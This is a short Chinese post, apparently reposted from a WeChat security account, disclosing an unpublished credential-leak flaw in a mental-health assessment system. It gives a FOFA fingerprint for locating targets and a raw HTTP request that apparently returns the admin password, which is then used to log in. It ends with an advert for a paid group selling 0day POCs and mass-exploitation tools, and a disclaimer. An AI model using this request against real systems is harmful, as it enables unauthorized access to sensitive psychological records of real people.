[未公开]京师心智心理健康测评系统-账号密码泄露
资产测绘
body="JS/ligerComboBox/ligerTree.js"
数据请求包
GET /FunctionModular/PersonalReport/Ajax/MyReport.ashx?type=3&loginName=admin HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
使用解密后的密码登录系统
使用账号密码admin/******登录系统
漏洞利用
圈子介绍
【圈子介绍】
高质量漏洞利用工具分享社区,每天至少更新一个0Day/Nday/1day及对应漏洞的批量利用工具,团队内部POC分享,星球不定时更新内外网攻防渗透技巧以及最新学习研究成果等。分享行业最新资讯,交流解答各类技术问题
【圈子服务】
1,一年至少365+漏洞Poc及对应漏洞批量利用工具
2,24HVV内推途径(直面厂商)
3,Fofa高级会员api及各种漏洞利用工具及后续更新,渗透工具、文档资源分享
4,内部漏洞库情报分享(目前已有850+poc,会定期更新,包括部分未公开0/1day)
5,加入内部微信群,认识更多的行业朋友(群里有100+C**D通用证书师傅),遇到任何技术问题都可以进行快速提问、讨论交流;
圈子目前价格为59元(交个朋友啦!),现在星球有近300+位师傅相信选择加入我们圈子,圈子每天都会更新内容。
圈子收集近期LD库
免责声明
文章所涉及内容,仅供安全研究与教学之用,由于传播、利用本文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。
原文始发于微信公众号(银遁安全团队):[未公开]京师心智心理健康测评系统-账号密码泄露
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论